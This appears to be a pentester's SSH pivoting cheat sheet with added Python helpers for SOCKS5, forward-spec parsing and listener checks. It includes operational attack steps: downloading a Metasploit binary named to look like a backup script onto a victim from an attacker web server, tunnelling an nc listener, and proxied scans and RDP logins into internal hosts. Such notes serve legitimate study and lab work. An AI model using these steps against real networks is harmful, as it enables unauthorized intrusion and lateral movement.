SSH
This is more of a cheat sheet for commands.
Local Port Forwarding
Local Port Forwarding
ssh -L 1234:localhost:3306 user@10.129.202.64
Opens a listener on local port 1234 (our machine) and forwards all traffic sent to it to port 3306 on the remote host 10.129.202.64 (the "localhost" in the spec is resolved on the remote side, i.e. it is the remote host's own loopback).
Forwarding multiple ports
ssh -L 1234:localhost:3306 -L 8080:localhost:80 user@10.129.202.64
This SSH command connects to the remote machine and sets up two local port forwards (each forward needs its own -L):
Local port 1234 forwards to port 3306 on the remote machine (typically MySQL).
Local port 8080 forwards to port 80 on the remote machine (typically HTTP).
Local Port Forwarding Example

jumphost@ubuntu$ ssh -N -L 0.0.0.0:4455:172.16.50.217:445 user@10.4.50.215
Opens a listener on port 4455 on the jump host (CONFLUENCE01) and forwards all traffic through 10.4.50.215 to 172.16.50.217:445 (PGDATABASE01). Because the listener binds 0.0.0.0, any host that can reach the jump host can use this forward, not just processes on the jump host itself.
NOTE: The -N flag means "do not execute a remote command": no shell is opened, only the forward is set up.
Dynamic Port Forwarding - Tunneling over SOCKS proxy
A local port forward ties one listening socket to one fixed destination socket. OpenSSH also supports dynamic port forwarding: from a single listening port, connections can be forwarded to any socket the SSH server can route to. This works because the listening port is a SOCKS proxy, so each client request names its own destination.
Dynamic Port Forwarding from Attack Host:
attacker@kali$ ssh -D 9050 user@jump_host_ip
NOTE: The -D flag enables dynamic port forwarding; ssh acts as a SOCKS server on the given port.
$ tail -4 /etc/proxychains.conf
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
Dynamic Port Forwarding From Jump Host:
jump-host@ubuntu$ ssh -D 0.0.0.0:9050 user@internal_host_ip
NOTE: The bind address 0.0.0.0 is required here. Without it the SOCKS listener binds only to the jump host's loopback interface, and Kali could not reach it at 192.168.198.63:9050 as configured below.
┌──(kali㉿kali)-[~]
└─$ tail -f /etc/proxychains4.conf
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 192.168.198.63 9050 # IP address of jump host
Using tools with Proxychains:
Nmap:
This is my preferred nmap command to run through the proxy (172.16.50.217 is on the internal network). A TCP connect scan (-sT) is required because SOCKS only carries full TCP connections, and -Pn skips the ICMP ping, which cannot traverse the proxy.
kali@kali:~$ proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217
xfreerdp:
kali@kali$ proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
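proxychains works by intercepting each connect() of the wrapped tool (nmap, xfreerdp) and replaying it as a SOCKS request to the proxy named in its config, which for `ssh -D` is the SSH client's listener. The following is an added example, not part of this page and not proxychains or OpenSSH code: a minimal SOCKS5 CONNECT client that performs exactly that exchange, run against a constructed fake SOCKS5 server (FakeSocks5Server) so it can be tested offline. socks5_connect, demo and the addresses used in demo are names and values chosen here; the fake server is configured to "refuse" 172.16.50.217:445 only to show how a failed CONNECT is reported.

```python
"""Minimal SOCKS5 CONNECT client plus a constructed fake proxy (added example, not from the page)."""
import socket
import struct
import threading

SOCKS_VERSION = 5
CMD_CONNECT = 1
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 1, 3, 4
REPLY_TEXT = {0: "succeeded", 2: "not allowed by ruleset", 4: "host unreachable", 5: "connection refused"}


def _recv_exact(sock, n):
    """Read exactly n bytes or raise; SOCKS fields have fixed sizes."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def socks5_connect(proxy_host, proxy_port, dest_host, dest_port, timeout=5.0):
    """Open a TCP connection to dest_host:dest_port through a SOCKS5 proxy (what proxychains does per connect())."""
    sock = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    # 1. greeting: version 5, one method offered, 0x00 = no authentication
    sock.sendall(bytes([SOCKS_VERSION, 1, 0x00]))
    ver, method = _recv_exact(sock, 2)
    if ver != SOCKS_VERSION or method != 0x00:
        sock.close()
        raise ConnectionError(f"proxy rejected no-auth handshake (ver={ver}, method={method})")
    # 2. CONNECT request: dotted quad as ATYP 1, anything else as a domain name (ATYP 3) so the far side resolves it
    try:
        payload = bytes([ATYP_IPV4]) + socket.inet_aton(dest_host)
    except OSError:
        name = dest_host.encode()
        payload = bytes([ATYP_DOMAIN, len(name)]) + name
    sock.sendall(bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + payload + struct.pack("!H", dest_port))
    # 3. reply: VER REP RSV ATYP BND.ADDR BND.PORT; consume the bound address and port
    ver, rep, _rsv, atyp = _recv_exact(sock, 4)
    bound_len = {ATYP_IPV4: 4, ATYP_IPV6: 16}.get(atyp) or _recv_exact(sock, 1)[0]
    _recv_exact(sock, bound_len + 2)
    if rep != 0:
        sock.close()
        raise ConnectionError(f"SOCKS5 CONNECT failed: {REPLY_TEXT.get(rep, rep)}")
    return sock


class FakeSocks5Server:
    """Constructed stand-in for the `ssh -D` listener (offline testing only): accepts CONNECT, records the
    requested destination, refuses anything in `blocked`, otherwise echoes bytes back in place of a real target."""

    def __init__(self, blocked=()):
        self.blocked, self.requests = set(blocked), []
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            conn, _ = self.sock.accept()
            threading.Thread(target=self._handle, args=(conn,), daemon=True).start()

    def _handle(self, conn):
        with conn:
            _ver, nmethods = _recv_exact(conn, 2)
            _recv_exact(conn, nmethods)
            conn.sendall(bytes([SOCKS_VERSION, 0x00]))
            _ver, _cmd, _rsv, atyp = _recv_exact(conn, 4)
            if atyp == ATYP_IPV4:
                host = socket.inet_ntoa(_recv_exact(conn, 4))
            else:  # domain form; IPv6 is not handled by this toy server
                host = _recv_exact(conn, _recv_exact(conn, 1)[0]).decode()
            port = struct.unpack("!H", _recv_exact(conn, 2))[0]
            self.requests.append((host, port))
            rep = 5 if (host, port) in self.blocked else 0  # 5 = connection refused
            conn.sendall(bytes([SOCKS_VERSION, rep, 0x00, ATYP_IPV4]) + b"\x00" * 6)
            while rep == 0:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)


def demo():
    """Exercise the client against the fake proxy; returns values a test can assert on."""
    proxy = FakeSocks5Server(blocked=[("172.16.50.217", 445)])   # constructed "refused" destination
    s = socks5_connect("127.0.0.1", proxy.port, "10.4.50.215", 5432)
    s.sendall(b"ping")
    echoed = _recv_exact(s, 4)
    s.close()
    try:
        socks5_connect("127.0.0.1", proxy.port, "172.16.50.217", 445)
        refused = None
    except ConnectionError as exc:
        refused = str(exc)
    return {"echoed": echoed, "requests": list(proxy.requests), "refused": refused}
```

Run demo() to see the successful CONNECT (echoed bytes), the destinations the proxy saw, and the error text for the refused one. Against a real `ssh -D` listener the same socks5_connect call works unchanged; that listener speaks both SOCKS4 and SOCKS5, which is why either a socks4 or a socks5 line works in proxychains.conf.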
Remote Port Forwarding
Also known as reverse port forwarding. In real-world scenarios we are likely to encounter a firewall that heavily restricts inbound connections; outbound connections, however, are less likely to be blocked. So the compromised host opens the SSH connection to us, and the forward rides over that outbound connection.

Start SSH Service
kali:~$ sudo systemctl start ssh
Connect back to Kali Host
The command below opens port 2345 on localhost (127.0.0.1) on our Kali machine. All traffic sent to it is forwarded through the jump host to 10.4.50.215:5432.
victim@jump-host$ ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@kali_ip
Verifying Port Forward
As we can see, our Kali box is now listening on 127.0.0.1:2345.
kali@kali$ ss -ntlpu
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0      0.0.0.0:52704       0.0.0.0:*
tcp   LISTEN 0      128    127.0.0.1:2345      0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
tcp   LISTEN 0      128    [::]:22             [::]:*
Remote Dynamic Port Forwarding
NOTE: This tends to be the most useful setup for port forwarding during engagements: it combines the flexibility of dynamic (SOCKS) forwarding with the outbound-only connection of a remote forward.
Create Dynamic Remote Port Forward
Creating a dynamic remote port forward is similar to creating a remote port forward. We use the -R option with only a port: no destination address is given, and -D is not used. When -R has no destination, OpenSSH makes the listener on the SSH server a SOCKS proxy, and the outbound connections are made from the client side (here, the jump host).
jumphost@ubuntu$ ssh -N -R 9998 kali@kali_ip
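The forwarding specs on this page all follow the same `[bind_address:]port:host:hostport` shape, and the port-only -R form above is the one case where the destination is absent. The following is an added example written for this cheat sheet, not OpenSSH code: a small parser that explains, for each -L/-R/-D spec, which side listens and which side connects, flags listeners bound to all interfaces, and builds a correct multi-forward command line. parse_forward, describe and build_command are names chosen here; it assumes OpenSSH's defaults (no bind address means loopback only, an empty or "*" bind address means all interfaces) and leaves out IPv6 bracket syntax.

```python
"""Parse and explain OpenSSH -L / -R / -D forwarding specs (added example, not OpenSSH code)."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Bind values that make a listener reachable from other hosts (OpenSSH: empty or "*"
# means all interfaces; no bind address at all means loopback only by default).
ALL_INTERFACES = {"", "*", "0.0.0.0", "::"}


@dataclass
class Forward:
    kind: str                    # local | remote | dynamic | remote-dynamic
    bind_address: Optional[str]  # None = not given, OpenSSH default (loopback)
    listen_port: int
    dest_host: Optional[str]     # None for the two SOCKS forms
    dest_port: Optional[int]

    def exposed(self) -> bool:
        """True if other hosts can reach the listener, not just local users."""
        return self.bind_address in ALL_INTERFACES


def parse_forward(flag: str, spec: str) -> Forward:
    """Parse the argument of -L, -R or -D (IPv6 bracket syntax left out for brevity)."""
    parts = spec.split(":")
    if flag == "-D":
        if len(parts) > 2:
            raise ValueError("-D takes [bind_address:]port")
        bind = parts[0] if len(parts) == 2 else None
        return Forward("dynamic", bind, int(parts[-1]), None, None)
    if flag not in ("-L", "-R"):
        raise ValueError("flag must be -L, -R or -D")
    kind = "local" if flag == "-L" else "remote"
    if len(parts) == 4:
        bind, port, host, hostport = parts
        return Forward(kind, bind, int(port), host, int(hostport))
    if len(parts) == 3:
        port, host, hostport = parts
        return Forward(kind, None, int(port), host, int(hostport))
    if flag == "-R" and len(parts) in (1, 2):
        # -R [bind_address:]port with no destination: the SSH server's listener
        # is a SOCKS proxy and the client side makes the outbound connections
        bind = parts[0] if len(parts) == 2 else None
        return Forward("remote-dynamic", bind, int(parts[-1]), None, None)
    raise ValueError(f"unsupported {flag} spec: {spec}")


def describe(fwd: Forward) -> str:
    """One-line explanation of who listens where and who connects to what."""
    side = "ssh client" if fwd.kind in ("local", "dynamic") else "ssh server"
    other = "ssh server" if side == "ssh client" else "ssh client"
    where = "all interfaces" if fwd.exposed() else (fwd.bind_address or "127.0.0.1")
    if fwd.dest_host is None:
        return (f"{side} listens on {where}:{fwd.listen_port} as a SOCKS proxy; "
                f"the {other} connects wherever the SOCKS client asks")
    return (f"{side} listens on {where}:{fwd.listen_port}; "
            f"the {other} connects to {fwd.dest_host}:{fwd.dest_port}")


def build_command(target: str, forwards: List[Tuple[str, str]], no_shell: bool = True) -> List[str]:
    """Build the ssh argv; every forward needs its own flag ('-L a -L b', not '-L a b')."""
    argv = ["ssh"]
    if no_shell:
        argv.append("-N")  # set up the forwards only, open no remote shell
    for flag, spec in forwards:
        parse_forward(flag, spec)  # validate each spec before emitting it
        argv += [flag, spec]
    argv.append(target)
    return argv


if __name__ == "__main__":
    # Specs taken from the commands on this page
    for flag, spec in [("-L", "1234:localhost:3306"), ("-L", "0.0.0.0:4455:172.16.50.217:445"),
                       ("-D", "9050"), ("-R", "127.0.0.1:2345:10.4.50.215:5432"), ("-R", "9998")]:
        fwd = parse_forward(flag, spec)
        print(f"{flag} {spec:<35} {describe(fwd)}" + ("  [exposed]" if fwd.exposed() else ""))
```

Running it lists each forward from the page with its listening side and destination; the 0.0.0.0:4455 jump-host forward is the only one marked exposed, which is the property to check before leaving a tunnel up on a shared host.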
Update SOCKS Proxy - proxychains
kali@kali:~$ tail /etc/proxychains4.conf
# proxy types: http, socks4, socks5, raw
# * raw: The traffic is simply forwarded to the proxy without modification.
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9998 # IP address is localhost 127.0.0.1
Verifying Port Forward
As we can see, our Kali box is now listening on 127.0.0.1:9998.
kali@kali$ ss -ntlpu
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0      0.0.0.0:52704       0.0.0.0:*
tcp   LISTEN 0      128    127.0.0.1:9998      0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
tcp   LISTEN 0      128    [::]:22             [::]:*
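The two `ss -ntlpu` checks on this page (for ports 2345 and 9998) can be automated, which is handy when a script sets up several tunnels and you want to confirm each one came up and is not bound wider than intended. The following is an added example, not from the page: SAMPLE_SS is constructed to match the shape of the output shown above (it is not real output), and parse_ss and check_forward are names chosen here.

```python
"""Check `ss -ntlpu` output for a forward's listener (added example, not from the page)."""
from typing import List, NamedTuple, Tuple

# Constructed sample shaped like the `ss -ntlpu` output on this page (not real output)
SAMPLE_SS = """\
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0      0.0.0.0:52704       0.0.0.0:*
tcp   LISTEN 0      128    127.0.0.1:2345      0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:4455        0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
tcp   LISTEN 0      128    [::]:22             [::]:*
"""

WILDCARDS = {"0.0.0.0", "[::]", "*"}   # bound on every interface, reachable from other hosts


class Listener(NamedTuple):
    proto: str
    address: str
    port: int


def parse_ss(output: str) -> List[Listener]:
    """Extract (proto, local address, port) from each socket line; the header is skipped."""
    listeners = []
    for line in output.splitlines():
        fields = line.split()
        # Expect: Netid State Recv-Q Send-Q Local Peer [Process]
        if len(fields) < 6 or fields[1] not in ("LISTEN", "UNCONN"):
            continue
        address, _, port = fields[4].rpartition(":")
        if port == "*":
            continue
        listeners.append(Listener(fields[0], address, int(port)))
    return listeners


def check_forward(output: str, port: int, proto: str = "tcp") -> Tuple[bool, bool]:
    """Return (present, exposed): is there a listener on the port, and does it bind a wildcard address?"""
    matches = [l for l in parse_ss(output) if l.proto == proto and l.port == port]
    return bool(matches), any(l.address in WILDCARDS for l in matches)


if __name__ == "__main__":
    for p in (2345, 4455, 9998):
        present, exposed = check_forward(SAMPLE_SS, p)
        print(f"port {p}: present={present} exposed={exposed}")
```

On a live system, feed it `subprocess.run(["ss", "-ntlpu"], capture_output=True, text=True).stdout` instead of SAMPLE_SS. A remote forward created with `-R 127.0.0.1:2345:...` should come back as (True, False); a (True, True) result means the tunnel endpoint is reachable by anyone who can reach the host.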
Additional Info
Transferring a Metasploit Binary to the Victim (on the internal network).
We may need to transfer a binary to a machine we've gained access to so that we can port forward from it.
PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"
Tunneling to Kali Web Server
If the host has ssh, we can connect back to our Kali box to tunnel traffic.
This command opens port 1234 on all interfaces of the host and tunnels everything sent to it back through the SSH connection to our Kali web server at 192.168.45.186:8000. This is useful when downloading tools to a host inside an internal network: other internal hosts fetch from port 1234 on this host and never need a route to Kali.
C:\Users\web_svc>ssh -N -L 0.0.0.0:1234:192.168.45.186:8000 kali@kali_ip
Tunneling NC Listener
Like the command above, we can create the same kind of tunnel for an nc listener: connections to port 1234 on this host reach our listener on 192.168.45.186:4444.
C:\Users\web_svc>ssh -N -L 0.0.0.0:1234:192.168.45.186:4444 kali@kali_ip
Tunnel Internal Web Service
Like we did above, we can port forward an internal web service back to our Kali host. In both commands, web_service_port is the port the service listens on (on the victim's loopback) and local_port is the port we open on Kali.
Reverse Port Forward (run from the victim: the victim connects out to Kali and exposes its service on Kali's local_port)
victim@ubuntu$ ssh -N -R local_port:localhost:web_service_port kali@kali_ip
Local Port Forward (run from Kali: Kali connects to the victim and opens local_port, which reaches the victim's web_service_port)
kali@kali$ ssh -L local_port:localhost:web_service_port victim@victim_ip
Port Forwarding an Internal Web Service
Say we discover a web service that is running locally on the victim, or that only allows connections from 127.0.0.1. We can port forward the service back to our Kali host and access it locally on port 8443.

$ ssh user@victim_ip -L 8443:127.0.0.1:8443